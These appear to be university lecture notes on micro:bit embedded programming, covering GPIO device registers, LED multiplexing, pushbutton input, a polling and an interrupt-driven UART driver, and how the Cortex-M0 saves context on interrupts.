[8.4] On the ARM, I/O devices appear as special storage locations (called device registers) in the same address space as RAM and Flash. Loading from or storing to one of these locations gives information about the external world, or has a side-effect that is externally visible. For example, there are two storage locations, one at address 0x50000514 that we shall call GPIO_DIR, and another at address 0x50000504 that we shall call GPIO_OUT. Storing a bit pattern in GPIO_DIR lets us configure the individual pins as inputs or outputs, and storing to GPIO_OUT sets the voltage on each output pin to high (if 1) or low (if 0). We can set these locations like any other, using an str instruction with a specific address; so to set the GPIO_DIR register to the constant 0xfff0 (thereby configuring 12 of the GPIO pins as outputs), we can use the code

ldr r0, =0x50000514
ldr r1, =0xfff0
str r1, [r0]

In a C program, things are a bit easier. There's a header file hardware.h that contains definitions of all the device registers we shall use in the course; including it allows us to use GPIO_DIR in a program to denote the device register with address 0x50000514, and we can store the constant 0xfff0 in that register just by writing

GPIO_DIR = 0xfff0;

The compiler translates this into exactly the code shown earlier. You need not delve into the details except to satisfy your curiosity.

The GPIO_DIR register has a row of latches that remember whether each GPIO pin is configured as an input (0) or an output (1), and the GPIO_OUT register has a row of latches that remember the output voltage that has been selected for each pin, either low (0) or high (1). Internally, the same electronic signals that, for an ordinary RAM location, would cause the RAM to update the contents of a word in this case set the latches, and therefore the output directions or values. (On other architectures such as the x86, I/O devices usually do not appear as storage locations accessed with the usual load and store instructions, but there are separate in and out instructions, and effectively a separate address space.) To use the LEDs, we first need to configure the GPIO port so that the relevant bits are outputs: this is achieved with the assignment GPIO_DIR = 0xfff0.

To light a single LED, we should connect its row to +3.3V and its column to 0V. Then current can flow through from the row pin, through the LED and its series resistor, to the column pin, and the LED will light up. The series resistor limits the current that can flow through the LED to a value that is safe both for the LED and the microcontroller pins that are connected to it. If we set the other row lines, apart from the one belonging to our chosen LED, to 0V and the other column lines to +3.3V, then other LEDs in the same row or column as the lit LED will have their anode and cathode at the same potential, and will carry no current. LEDs that are not in the same row or column will have their anode at 0V and their cathode at +3.3V, so they will be reverse biased, and they also will carry no current, and only the one chosen LED will light. So to light the middle LED in the 5x5 array, which is electrically in row 2 and column 3, we set GPIO_OUT like this:

...   |R3 R2 R1 C9 |C8 C7 C6 C5 |C4 C3 C2 C1 |
...00 | 0  1  0  1 | 1  1  1  1 | 1  0  1  1 | 0000
             5           f             b         0

The needed assignment is GPIO_OUT = 0x5fb0.
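The same calculation can be packaged as a little C function. This is only a sketch for illustration – the name led_bits is invented – with rows numbered 1–3 and columns 1–9 to match the layout above:

/* led_bits -- GPIO_OUT value that lights the single LED (row, col) */
unsigned led_bits(int row, int col) {
    unsigned rows = 1 << (12 + row);             /* chosen row high, others low */
    unsigned cols = 0x1ff0 & ~(1 << (3 + col));  /* chosen column low, others high */
    return rows | cols;
}

For example, led_bits(2, 3) is 0x4000 | 0x1fb0 = 0x5fb0, the value we just computed by hand.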

Multiplexing

[8.5] We could light all 25 LEDs at once by setting all the row lines high and all the columns low – 0xe000. Each individual LED would be a bit dimmer, because the current available in each column (set by the 220Ω series resistor) would be shared among three LEDs. For most patterns, however, we will need to multiplex the three rows, lighting the correct LEDs in each row in turn, and pausing a bit before moving on to the next row. If the pauses are short enough, persistence of vision will make it seem that all the LEDs making up the pattern are lit together. For example, a heart pattern

. X . X .
X X X X X
X X X X X
. X X X .
. . X . .

is made by lighting LEDs 5, 6, 7, 9 in row 1, LEDs 1, 2, 3, 4, 5 in row 2, and LEDs 1, 4, 5, 6, 7, 8, 9 in row 3, so we want to use the bit patterns

0010 1000 1111 0000 = 0x28f0
0101 1110 0000 0000 = 0x5e00
1000 0000 0110 0000 = 0x8060

in succession.

[8.6] The code might be

while (1) {
    GPIO_OUT = 0x28f0;
    delay(JIFFY);
    GPIO_OUT = 0x5e00;
    delay(JIFFY);
    GPIO_OUT = 0x8060;
    delay(JIFFY);
}

A suitable value of JIFFY would be 5000, for a delay of 5 milliseconds expressed in units of 1 microsecond. Then an iteration of the loop will take just about 15 milliseconds, or about 66 frames per second, fast enough that no flickering will be visible.
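In the code, JIFFY is just a constant, and a definition consistent with the timing above would be

#define JIFFY 5000      /* 5ms delay, expressed in microseconds */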

[8.7] Displaying a single pattern is all very well, but if we want to display different patterns at different times, then we should not write separate code (with embedded hexadecimal constants) for each pattern, but rather represent the patterns as data, an array of three integers. We can create patterns by declaring initialised arrays like this:

static const unsigned heart[] = {
    0x28f0, 0x5e00, 0x8060
};

The static makes this a variable visible only from the file of code where it is declared, and the const makes it read-only, so that the C compiler and linker can put it in ROM instead of using (three words of) precious RAM space.

Then we can write a function like this that displays an arbitrary pattern, repeating the three rows n times:

/* show -- display three rows of a picture n times */
void show(const unsigned *img, int n) {
    while (n > 0) {
        // Takes 15msec per iteration
        for (int p = 0; p < 3; p++) {
            GPIO_OUT = img[p];
            delay(JIFFY);
        }
        n--;
    }
}

To make things simpler for the application programmer, we could also think about automating the process of deriving the hexadecimal constants, so that another pattern could be defined like this:

static const unsigned hollow[] =
    IMAGE(0,1,0,1,0,
          1,0,1,0,1,
          1,0,0,0,1,
          0,1,0,1,0,
          0,0,1,0,0);

I'll leave that as something for C experts to investigate!

What about those delays? The easiest way of implementing them is to write a loop that counts down from some constant, creating a predictable delay. With a bit of care, we can write a loop that takes 500ns per iteration, so to delay d microseconds we need to make it iterate 2d times.

void delay(unsigned usec) {
    unsigned n = 2*usec;
    while (n > 0) {
        nop(); nop(); nop();
        n--;
    }
}

Looking at the compiler output (and timing it with a scope) reveals that the loop takes 5 cycles per iteration without the nop instructions, so adding three of them brings it up to 8 cycles per iteration, or 500nsec at 16MHz. Delays were commonly implemented like this in old-fashioned MS-DOS games, and the games became unplayable when they were moved to a machine with a faster clock than the original PC. The same thing might happen to us if next year's micro:bit has a faster clock, or if improvements in the C compiler were to affect its translation of the loop.

A more serious problem with delay loops is that they force the machine to do nothing useful during the delay. That is a problem we will solve later – by using a hardware timer in place of the delay loop, then making the program interrupt controlled, and ultimately by introducing an operating system that is able to schedule other processes to run while waiting for the timer to fire.

The push-buttons on the micro:bit are connected to other GPIO pins that can be configured as inputs. For various reasons, the buttons are wired with pull-up resistors as shown in the schematic above, so that the input signal to the chip is +3.3V if the button is not pushed (a logical 1), and drops to 0V (a logical 0) when it is pushed. Lab 2 begins with a program (an electronic Valentine's card) that shows a beating heart pattern, and asks you to enhance it so that pressing the buttons changes the pattern shown on the display.

Pushbuttons

Pushbutton with pullup resistor

The micro:bit has two 'user' pushbuttons on the front of the board (in addition to the reset button on the back). These are connected to a microcontroller pin using a pull-up resistor, as shown in the circuit diagram at the right, so that the pin sees a voltage of +3.3V when the button is released, and 0V when it is pressed.

The two pins that are connected to buttons are identified by the constants BUTTON_A and BUTTON_B defined in hardware.h. In order to use the buttons in a program, we must first configure those pins so they are connected as inputs. There's an array of I/O registers called GPIO_PINCNF, with one element to control the configuration of each GPIO pin. To connect a pin for input, we must set the GPIO_PINCNF_INPUT field of the relevant element to the value GPIO_INPUT_Connect, like this:

SET_FIELD(GPIO_PINCNF[BUTTON_A], GPIO_PINCNF_INPUT, GPIO_INPUT_Connect);

Since the power-up values of all other fields in these registers are zero, and the value of GPIO_INPUT_Connect is also zero, it's more common to do this job with the simpler assignment

GPIO_PINCNF[BUTTON_A] = 0;

Once this configuration has been done (for BUTTON_B also), the program can discover the state of the buttons by reading the register GPIO_IN and looking at the relevant bits, like this:

unsigned x = GPIO_IN;
if (GET_BIT(x, BUTTON_A) == 0 || GET_BIT(x, BUTTON_B) == 0) {
    // A button is pressed
}

You can easily design variants of this code for yourself, for example to do different things depending on which button is pressed.

Physical pushbuttons tend to suffer from the problem that the signal changes state several times over a period of several milliseconds after the button is pressed or released, a phenomenon called contact bounce. If software is going to treat a button press as an event rather than a state (such as counting the number of button presses), then it's wise to implement a scheme where contact bounce is filtered out, such as not reacting to a press until the button has produced the same value in several samples taken several milliseconds apart.
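Here is one possible shape for such a filter – a sketch rather than lab code, with the invented name debounced_read – that uses GPIO_IN, GET_BIT and delay from above and insists on five consecutive matching samples taken 2ms apart:

/* debounced_read -- sample a pin until 5 successive readings agree */
int debounced_read(int pin) {
    int last = GET_BIT(GPIO_IN, pin);
    int count = 0;

    while (count < 5) {
        delay(2000);                  /* sample every 2ms */
        int now = GET_BIT(GPIO_IN, pin);
        if (now == last)
            count++;                  /* another sample agrees */
        else {
            last = now;               /* bounce: start counting again */
            count = 0;
        }
    }

    return last;                      /* 0 means the button is pressed */
}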

Questions

What does the assignment statement GPIO_OUT = 0x4000 look like in assembly language?

GPIO_OUT is a macro defined in hardware.h as (* (volatile unsigned *) 0x50000504). This definition exploits the weak type system of C, and denotes an unsigned variable at the numeric address 0x50000504, a constant obtained from the nRF51822 datasheet. The volatile keyword amounts to saying to the C compiler, "Please just do any assignments immediately: don't try to be clever and optimise in any way, such as combining one assignment with a later one that targets the same address."

To achieve the same effect in assembly language, we need an str instruction for the assignment. But both the address being assigned to and the value being assigned are large constants, so we'll need to put the constants in registers first, using the pc-relative load instructions for which "ldr =" is a shorthand. So suitable code is

ldr r0, =0x4000
ldr r1, =0x50000504
str r0, [r1]

Alternatively, we might put the address of the whole GPIO device in a register and address the individual device registers at small offsets from that base address.

ldr r0, =0x4000
ldr r1, =0x50000500
str r0, [r1, #0x4]

How does the IMAGE macro work?

The declaration

const unsigned heart[] =
    IMAGE(0,1,0,1,0,
          1,1,1,1,1,
          1,1,1,1,1,
          0,1,1,1,0,
          0,0,1,0,0);

defines heart to be an array of constants that represent the heart image. It is reduced to a simple array declaration by a process of textual substitution (performed by the C preprocessor), followed by simplification (performed by the C compiler proper). Let's follow the process with the example. When compiling for V1, the IMAGE macro is defined like this:

#define IMAGE(x11, x24, x12, x25, x13,                               \
              x34, x35, x36, x37, x38,                               \
              x22, x19, x23, x39, x21,                               \
              x18, x17, x16, x15, x14,                               \
              x33, x27, x31, x26, x32)                               \
    { __ROW(ROW1, x11, x12, x13, x14, x15, x16, x17, x18, x19),      \
      __ROW(ROW2, x21, x22, x23, x24, x25, x26, x27, 0, 0),          \
      __ROW(ROW3, x31, x32, x33, x34, x35, x36, x37, x38, x39) }

See how the documented wiring pattern is reflected in the order that the 25 arguments to the macro are listed? So as a first step, the declaration of heart is expanded into

const unsigned heart[] =
    { __ROW(ROW1, 0, 0, 0, 0, 1, 1, 1, 0, 1),
      __ROW(ROW2, 1, 1, 1, 1, 1, 0, 0, 0, 0),
      __ROW(ROW3, 1, 0, 0, 1, 1, 1, 1, 1, 1) };

But __ROW is itself a macro, defined by

#define __ROW(r, c1, c2, c3, c4, c5, c6, c7, c8, c9)                 \
    (BIT(r) | !c1<<4 | !c2<<5 | !c3<<6 | !c4<<7 | !c5<<8             \
     | !c6<<9 | !c7<<10 | !c8<<11 | !c9<<12)

(and ROW1, ROW2, ROW3 and BIT are also macros), so the preprocessor ultimately expands the declaration into

const unsigned heart[] =
    { ((1 << (13)) | !0<<4 | !0<<5 | !0<<6 | !0<<7 | !1<<8 | !1<<9 | !1<<10 | !0<<11 | !1<<12),
      ((1 << (14)) | !1<<4 | !1<<5 | !1<<6 | !1<<7 | !1<<8 | !0<<9 | !0<<10 | !0<<11 | !0<<12), 
      ((1 << (15)) | !1<<4 | !0<<5 | !0<<6 | !1<<7 | !1<<8 | !1<<9 | !1<<10 | !1<<11 | !1<<12) };

Because the macro expansion process is purely textual, it's possible to have a macro that expands into an arbitrary piece of program text, not just a single expression. In this case, the IMAGE macro expands into a curly-bracketed list of expressions that form the initialiser in an array declaration.

When the compiler itself encounters this expanded declaration, it starts to simplify it. It's a rule of C that an expression with a constant value is allowed wherever a simple constant may appear, so we may be sure that the C compiler will do its best. First, the ! operator maps 0 to 1 and 1 to 0, so that the bits have the right polarity. Next, the << operator shifts each bit to the right place, and the | operator combines the bits into a single word. There are a few extra parentheses in the expression that have been inserted by various macros for safety, and these are just ignored by the compiler as they should be. The upshot is that the compiler treats the declaration as if it had been written

const unsigned heart[] = {
    0x28f0, 0x5e00, 0x8060
};

but with a lot less effort on the part of the programmer. The calculation of these bit patterns happens entirely at 'compile time', while the compiler is deciding what binary data will make up the code that it outputs. The compiler reduces the input expression to a simple table, and no calculations of bit patterns happen at 'run time', while the program is running.


Lecture 9 – Serial I/O

Serial protocol. A simple, polling UART driver.

Serial communication

GPIO pins let us communicate from a program to the outside world, but they are little more (as far as we've seen) than a direct connection between the bits of a register in the microcontroller and signal wires in the external circuit. A serial communications interface provides an example of a more elaborate I/O device, capable of actions independent of the CPU; the complexity this adds is necessary, because serial transmission must be done with timing that is more precise than we can achieve with direct CPU control – or at least, more precise unless the CPU is doing nothing else.

[9.1] Here is a trace (obtained with a logic analyser) of a character being sent over a serial interface at a speed of 9600 baud: that is, 9600 bit-clocks per second.

RS-232 waveform

The relevant traces are the signal (marked D1) that appears on the wire, and below it two analyses performed by the logic analyser software starting from the captured data. One of these (marked UART) shows the individual bits that are transmitted, and the characters they make up, and the other (marked Timing) shows the duration of each low or high period of the signal.

The character begins with a start bit during which the signal is 0V; the start bit lasts for precisely 104μs = 1/9600s. There then follow 8 bits of data, sent LSB first, with 0 encoded by 0V and 1 encoded by +3.3V. The bits (in order of transmission) are 10010110, making (reading backwards) the character 0x69, or lower-case 'i' in ASCII. The transmission ends with a stop bit at the high level, 3.3V. The signal could then stay at a high level for a while, but just disappearing off the right-hand side of the screen, you can see that the start bit for the next character in this case follows immediately. This pattern, a start bit followed by 8 data bits (no hardware parity bit), and a stop bit, is the most common variant of serial transmission, and is described by the abbreviation 8N1. There are ten bit-periods per character transmitted, so 9600 8N1 is capable of a peak transmission rate of 960 characters/sec. These conventions are standardised and often go by the term RS-232: but strictly speaking that standard requires voltage levels of ±12–15V suitable for use with old-fashioned teleprinters, and recent computers more commonly use voltages of 5V and 0V or (as here) 3.3V and 0V. Although we shall not use it, it's possible to add a parity bit to each character so that the receiving end can check whether a bit of the character has been corrupted in transmission.

Note that there is no clock signal shared between receiver and transmitter, so precise timing is essential. In order to achieve this, both transmission and reception are commonly implemented in hardware. The transmitter makes sure each bit-period lasts precisely 104μs, and the receiver, after seeing the falling edge of the start bit, will wait for 1.5 bit-periods in order to sample the first bit in the middle of its period; then it samples at 2.5, 3.5, ... bit-periods after the start so as to capture successive bits. (Interfaces commonly sample multiple times per bit-period and use majority voting to improve their immunity to noise.) The receiver can look for the stop bit to verify that the timing is reasonably accurate before announcing that it has received a character.
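To make the timing rule concrete, here is what reception would look like if it were done in software. This is purely illustrative – read_rx and delay_us are invented names for sampling the RX pin and waiting a number of microseconds – and real interfaces do this in hardware:

extern int read_rx(void);             /* invented: sample the RX pin */
extern void delay_us(unsigned usec);  /* invented: busy-wait for usec microseconds */

/* rx_byte -- bit-banged reception of one 8N1 character at 9600 baud */
int rx_byte(void) {
    while (read_rx() != 0) { }   /* wait for the falling edge of the start bit */
    delay_us(156);               /* 1.5 bit-periods: middle of the first data bit */

    int byte = 0;
    for (int i = 0; i < 8; i++) {
        byte |= read_rx() << i;  /* LSB arrives first */
        delay_us(104);           /* on to the middle of the next bit */
    }

    return byte;                 /* the stop bit follows: the line goes high */
}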

The serial interface is called a UART (for Universal Asynchronous Receiver/Transmitter) – Universal because it can deal with speeds other than 9600 baud and encodings different from 8N1; and Asynchronous because of the lack of a shared clock. The UART derives its timing by dividing the 16MHz system clock, and part of the configuration process is to set the division ratio to give an accurate bit-rate. The UART has two halves – a receiver and a transmitter – and a serial connection usually consists of two wires, one linking TX on one device to RX on the other, and the second linking RX to TX, for "full duplex" operation. It's possible to add two additional wires labelled RTS and CTS for 'hardware flow control', so that either end can signal to the other that it is not ready to receive any more characters and transmission should be delayed. As is common, we will not bother with these signals, assuming that both ends are able to consume characters at the highest rate they can be transmitted. At 9600 baud, this should not cause any problems.

A basic driver

The nRF51822 has a single UART that can be connected to the USB interface chip on the micro:bit board, and then appears as a USB serial interface on the host computer. We have already used this interface to experiment with assembly language programming. The UART is presented to a program running on the nRF51822 as a collection of device registers at fixed addresses, and predefined constants like UART_TXD let us access these registers. Some of the registers are used for configuration, and we need not list them in detail, but two are used in the process of transmitting characters. By putting a character in the register UART_TXD, the program can start the UART transmitting the character over the serial line. To find out when the transmission is finished, the program can check another register, UART_TXDRDY, which is set to 1 when the UART is ready for another character. If another character is immediately put in UART_TXD, then it will follow the first character without a gap, as shown in the scope trace above. If there is some delay before the program provides another character, then the TX line will just remain high, and the device on the other end of the wire will wait.

[9.2] The main difficulty is that we mustn't ask the UART to transmit another character until it has finished with the previous one, or it will get confused, either cutting off the transmission of the first character in the middle, or maybe ignoring the second character. So before sending a character, we must ensure that UART_TXDRDY has been set to 1 by the device. The simplest way of doing this is to wait in a busy loop.

void serial_putc(char ch) {
    while (! UART_TXDRDY) { /* do nothing */ }
    UART_TXDRDY = 0;
    UART_TXD = ch;
}

(This code omits a detail connected with transmitting the very first character.) This works, but it suffers from the same problem as the LED program – while the serial_putc function is waiting, no useful work is being done.
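For the curious, the omitted detail is probably something like this: UART_TXDRDY only becomes 1 after a character has been transmitted, so the very first character must be sent without waiting. A sketch using the txinit flag that serial_init (shown below) sets – the lab code may arrange things slightly differently:

void serial_putc(char ch) {
    if (! txinit)
        while (! UART_TXDRDY) { /* do nothing */ }
    txinit = 0;
    UART_TXDRDY = 0;
    UART_TXD = ch;
}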

[9.3] We can illustrate the problem with a program for printing the first 500 primes.

void init(void) {
     int n = 2, count = 0;

     serial_init();
     start_timer();

     while (count < 500) {
          if (prime(n)) {
               count++;
               printf("prime(%d) = %d\r\n", count, n);
          }
          n++;
     }

     stop_timer();
}

The program uses printf to print its results, a wrapper around serial_putc that looks like the standard C function for formatted output. I've included calls to functions start_timer and stop_timer that turn on and off an LED, so that we can time how long the program takes. We can run the program and connect to the micro:bit with minicom as before and see the primes scrolling past:

prime(1) = 2
prime(2) = 3
prime(3) = 5
...
prime(500) = 3571

Lab 3 has a version of this program: there, prime(n) is implemented by a simple algorithm that is quite slow, particularly because it is using a naïve algorithm for division. The time to find the next prime can get quite long, particularly when large gaps begin to appear, such as the one between 3229 and 3251. (And yes, we are testing the even numbers as well as the odd ones!)

[9.4] Initialising the UART is a bit involved, but the code can be copied from the manufacturer's example programs, and amounts to making proper settings of several device registers. The two pins (defined by constants USB_TX and USB_RX) must be configured one as an output and the other as an input, both with pullup resistors enabled. Then there is a device register that is set according to the baud rate, and another to set the format to 8N1. At the end come some assignments to start the sending and receiving processes and clear the flags that indicate the interface is ready for a character.

/* serial_init -- set up UART connection to host */
void serial_init(void) {
    UART_ENABLE = 0;
    UART_BAUDRATE = UART_BAUD_9600;     // 9600 baud
    UART_CONFIG = 0;                    // format 8N1
    UART_PSELTXD = USB_TX;              // choose pins
    UART_PSELRXD = USB_RX;
    UART_ENABLE = UART_Enabled;
    UART_STARTTX = 1;
    UART_STARTRX = 1;
    UART_RXDRDY = 0;
    UART_TXDRDY = 0;
    txinit = 1;
}

[9.6] Actually, this program allows a small amount of overlap between printing one prime and looking for the next one. (How?) But once the primes start to thin out, pauses start to appear between lines of output. We can show this by connecting the micro:bit up to a logic analyser and capturing a trace. I am using an inexpensive PC-based logic analyser bought on eBay: similar devices are easily found by googling "logic analyser 24MHz 8ch". They are all based on the same Cypress microcontroller, and all the smarts are in the associated open-source software.

Connecting a logic analyser

In the picture, the micro:bit is connected to two channels of the logic analyser, using an edge connector breakout to make the signals available on header pins.

  • Channel 0 (black wire) is connected to a GPIO pin that is used to drive one of the LEDs. This shows when the LED is illuminated. (Detail: the column I've used is not one of the ones that is lit, so it is high when the LED pattern is placed on the GPIO pins, and reverts to low when the output register is reset to zero.)
  • Channel 1 (brown wire) is connected to the transmit line of the UART. The transmit and receive lines between the UART and the USB interface chip are not brought out to the edge connector, but are available at certain test points on the board. In the picture, a bodge wire connects the relevant test point to a header glued to the edge of the board, on the back as we look at it. The orange wire joins the header to the brown lead of the logic analyser.
  • The third connection (white wire) is ground.

The logic analyser lets us see traces of multiple signals over time: unlike an oscilloscope, it can record data from 8 channels for an almost unlimited time, but it records only a digital logic level for each channel, and not an analogue voltage. The logic analyser's software is equipped with decoders for a variety of protocols including serial data, so we can ask it to annotate the trace with the decoded characters.

[9.7] Here is a trace of the beginning of a run of the program, on a smaller timescale than the trace we saw earlier.

Start of execution
  • In the picture, you can see two traces: one (Channel 0) is the long pulse that powers the LED, showing that it takes 11.618 seconds to find all 500 primes; the other (Channel 1) is the signal on the serial line, and above it a decoding of the characters that are being sent. You can see the string "prime(1) = 2", followed by a carriage return ([0D]) and line feed ([0A]). The p that begins the next line of output "prime(2) = 3" follows immediately after the line feed without any delay.
  • The scale at the top is in milliseconds, and you can see that transmitting each character takes just a bit more than 1ms.

Further along the trace, we can see delays start to appear between one line of output and the next. Two successive lines of output read

prime(457) = 3229
prime(458) = 3251

Here is the corresponding part of the logic analyser trace, zoomed out a bit to show the length of the gap between them.

Gap in the output

From the times at the top, you can see that this portion comes from late in the run, about 10.2s in. There is a period of 25ms or so when the serial line is idle, between the line feed that ends one line of output and the p that begins the next one. During this period, the machine is testing successive numbers to see whether they are prime, and it is spending most of its time in a loop inside the division subroutine. Once the next prime has been found, the activity changes, and the machine spends most of its time in the loop shown above, waiting for UART_TXDRDY to become true. This behaviour is silly, because instead of idly waiting for transmission of a character to finish, the micro:bit could be doing useful work towards finding the next prime. As we shall see later, we can arrange for this to happen (without having to restructure our whole program) by introducing a buffer to store pending output characters, and using interrupts to make the processor respond whenever the UART is ready for the next character, without having it sit in a loop waiting.


Lecture 10 – Programming with interrupts

Interrupt-based driver for UART.

Without interrupts

We could improve the performance of the primes program by storing in a buffer (detailed implementation later) the characters that had been generated by printf but not yet sent over the UART. Then we could rewrite the inner loop of the prime-testing subroutine so that it checked whether the UART was ready to transmit another character:

int prime(int n) {
    int k = 2;

    while (k * k <= n) {
        if (n % k == 0) return 0;
        poll_uart();
        k++;
    }

    return 1;
}


void poll_uart(void) {
    if (UART_TXDRDY) {
       // send another char
    }
}

There are (at least) two big problems with this approach.

  1. It's really inefficient: the constant checking of the UART slows down the most computationally-intensive parts of the program.
  2. It makes maintaining the program really hard, because different parts of the task must be mingled together. In particular, the program can't use any library routines if those routines take an appreciable time, because any loops in them must be rewritten to include a call to poll_uart().

So we need to find a better way.


Interrupts

[10.1] A better approach in the primes program is to control the UART using an interrupt. We can configure the hardware of the UART specially so that the normal flow of execution of the program is interrupted when UART_TXDRDY becomes true, and at that point (between two successive instructions of the program), a special subroutine

uart_handler()

is called. We can arrange that serial_putc(ch) does not usually wait until it can output the character ch, but instead stores it in an array txbuf, and the interrupt handler retrieves characters from the array and sends them to the UART.

[10.2] We'll set up txbuf as a circular buffer, with two indices bufin and bufout, and (redundantly) a counter bufcnt that tells how many characters are stored. We can declare the variables we need like this:

#define NBUF 64

static volatile int bufcnt = 0;
static int bufin = 0;
static int bufout = 0;
static volatile char txbuf[NBUF];

static volatile int txidle;

Note the use of the volatile keyword for variables that are shared between the main program and the interrupt handler.

[10.3] If bufin < bufout, then the part of the array that is occupied wraps around from txbuf[NBUF-1] to txbuf[0].

A circular buffer

[10.4] Let's write the interrupt handler first:

void uart_handler(void) {
    if (UART_TXDRDY) {
        UART_TXDRDY = 0;
        if (bufcnt == 0)
            txidle = 1;
        else {
            UART_TXD = txbuf[bufout];
            bufcnt--;
            bufout = (bufout+1)%NBUF;
        }
    }
}
  • The interrupt handler begins by checking why it has been called: UART_TXDRDY = 1 is one reason, but there may be others.
  • If there is nothing to transmit, the handler sets the flag txidle.
  • Otherwise, it fetches a character from the buffer and starts the UART transmitting it.
  • Making NBUF a power of 2 will make the modulo operation %NBUF cheaper on a machine with no divide instruction.
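For instance, with NBUF equal to 64, the increment in the handler could be written with a mask instead of the modulo – the two are equivalent whenever NBUF is a power of 2:

bufout = (bufout + 1) & (NBUF - 1);   /* same as (bufout + 1) % NBUF */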

[10.5] Here is the corresponding code for serial_putc:

void serial_putc(char ch) {
    while (bufcnt == NBUF) pause(); 
    intr_disable();
    if (txidle) {
        UART_TXD = ch;
        txidle = 0;
    } else {
        txbuf[bufin] = ch;
        bufcnt++;
        bufin = (bufin+1)%NBUF;
    }
    intr_enable();
}

Because an interrupt may come at any time, we must be quite careful.

  • Variables such as bufcnt that are mentioned in both the main program and the interrupt handler are marked volatile. This prevents the compiler from looking at a loop such as
while (bufcnt == NBUF) pause();
and assuming that bufcnt doesn't change in the loop, and so does not need loading from memory in each iteration. On the contrary, bufcnt will eventually be reduced by the interrupt handler, and then the loop should terminate. This won't happen if the loop continues to look at a stale copy of the value in a register.
  • [10.6] We know bufcnt++ will be implemented by code like this:
ldr r0, =bufcnt
ldr r1, [r0]
                <-- Here!
add r1, r1, #1
str r1, [r0]
If an interrupt happens "here", then the effect of the statement bufcnt-- in the interrupt handler will be lost, because when the interrupt handler returns, it is an old value of bufcnt that is incremented. The simple solution is to disable interrupts throughout this function by putting intr_disable() at the start and intr_enable() at the end.
  • If the buffer is full when we want to add a character to it, then we must wait until at least one character has been removed from the buffer and sent to the UART. The idiom for doing this is the call pause(), implemented by a special instruction wfe (wait-for-event): this halts the processor until an interrupt occurs, saving power. It's possible that, even if this task is held up because the buffer is full, there are other tasks that could continue to run, and we might need them to run in order (for example) to continue updating the display. For that, we will need to introduce an operating system that allows multiple processes that run independently.
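The pause function itself can be a one-liner. One plausible definition, using the GNU C inline assembler – the actual definition in hardware.h may differ in detail:

/* pause -- halt the processor until the next interrupt or event */
#define pause()  asm volatile ("wfe")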

[10.7] For interrupts to work, we must enable them when the program starts. Here's some code to add to serial_init that does this.

void serial_init(void) {
    ...
    // Interrupt for transmit only
    UART_INTENSET = BIT(UART_INT_TXDRDY);
    enable_irq(UART_IRQ);
    txidle = 1;
}

There are three bits of hardware that play a part: the UART itself must be told to interrupt when TXDRDY is set (and not in this case when, e.g., RXDRDY is set because an input character has arrived). Then the chip's "Nested Vectored Interrupt Controller" must be set up, assigning an arbitrary priority to the UART interrupt, and setting a bit that allows the UART to interrupt the processor. Finally, the processor itself must be in a state where it accepts interrupts; this is the default, but it can be modified with the operations intr_disable() and intr_enable() used above.
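The middle step amounts to setting one bit in the NVIC's Interrupt Set-Enable register. A sketch of what enable_irq might expand to – NVIC_ISER is the conventional name for that register, and the definition in hardware.h may differ:

/* enable_irq -- allow interrupts from device irq to reach the CPU */
#define enable_irq(irq)  NVIC_ISER = BIT(irq)

Writing a 1 bit enables the corresponding interrupt line; 0 bits leave the other lines unaffected.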

Updated results

[10.8] We can run the modified program again to see whether the delays in the output have disappeared. The program starts in much the same way.

Primes with interrupts

The LED is on for a period about two seconds shorter than before. When we look at prime 458, the gap has disappeared, as have all other gaps in the output.

No more gaps

[10.9] If we look at the end of the run, there is a surprise: the output goes on after the main program has finished, as the interrupt handler continues to send characters until the buffer is empty.

Cheating at the end

Even though it cheats in this way, the program still runs a bit more quickly, because the time to find the primes is now entirely overlapped with the printing process.


Lecture 11 – The interrupt mechanism

What the hardware does with interrupts.


Saving and restoring context

Interrupts behave (from the programmer's point of view) as subroutine calls that are inserted between the instructions of a program, in response to hardware events. So that these subroutine calls do not disrupt the normal functioning of the program, it's important that the entire state of the CPU is preserved by the call. This means not only the data registers, but also the address stored in the link register, and the state of the flags. For example, if a leaf routine is interrupted and has its return address stored in the link register, then that return address must be preserved for use when the interrupted routine returns. And if an interrupt comes between the two instructions in a typical compare-and-branch sequence:

cmp r0, r1
beq label

then the flags set by the comparison must be preserved by the interrupt so they can be used to determine whether the branch is taken.

On the Cortex-M0, this is done in such a way that the interrupt handler can be an ordinary subroutine, compiled with the same conventions as any other. That means the compiler that translates each subroutine need not know which ones will be installed as interrupt handlers, and also that no assembly language coding is needed to install an interrupt handler. When an interrupt arrives:

  • The processor completes (or, rarely, abandons) the instruction it is executing.
  • Some of the processor state is saved on the stack. The saved state consists of the program counter, the processor status register (containing the flags), the link register, and registers r0, r1, r2, r3 and r12.
  • The link register lr is set to a magic value (not a valid address) that will be recognised later.
  • The program counter pc is loaded with the address of the interrupt handler. Each device that can interrupt (up to 48 different ones) has a number, and that number is used as an index into a table of interrupt vectors that (on the Nordic chip) is located in ROM at address 0.

The state is now as shown in the middle diagram below, which shows what happens when a subroutine P receives an interrupt with handler H.

Stack states during interrupt entry

The interrupt handler must obey the normal calling conventions of the machine: if it calls other subroutines (as it may) or uses registers r4–r7 (or, less likely, r8–r11) then it must save lr with its magic value and these registers in its stack frame. So, working together, the hardware and the procedure's prologue save all of r0–r12, plus the pc and lr, and things are arranged so that when the handler returns, it will use the magic value as its return address.

The interrupt handler is now running in a context that is equivalent to the one it would see if it had been called as an ordinary subroutine. It can make free use of registers r0–r3, and can use registers r4–r7 if it has saved them. It can call other subroutines that obey the same calling conventions, and their stack frames will occupy space below its frame and the exception frame on the stack.

When the handler returns, it will restore the values of r4–r11 to the values they had before the interrupt, then branch to the magic value. This signals the processor, instead of loading this value into the pc, to restore the values that were saved by the interrupt mechanism, and the processor returns to the interrupted subroutine. Global variables may have been changed by the interrupt handler – for example, a character may have been received by the UART and put in a buffer – but all the local state is just as it was before the interrupt handler was invoked.
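The hardware-saved part of the state occupies eight words on the stack, and can be pictured as a C struct – a sketch, with the field order (r0 at the lowest address) that the Cortex-M convention prescribes:

/* What the hardware pushes on interrupt entry */
struct exception_frame {
    unsigned r0, r1, r2, r3, r12;   /* scratch registers */
    unsigned lr;                    /* link register of the interrupted code */
    unsigned pc;                    /* address of the next instruction */
    unsigned psr;                   /* status register, including the flags */
};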

In each program, the table of interrupt handlers is put together by the linker, guided by the linker script NRF51822.ld, which specifies they should go at address 0. The code in startup.c makes each vector point to a default handler that flashes the Seven Stars of Death, unless a subroutine with an appropriate name such as uart_handler is defined somewhere in the program.

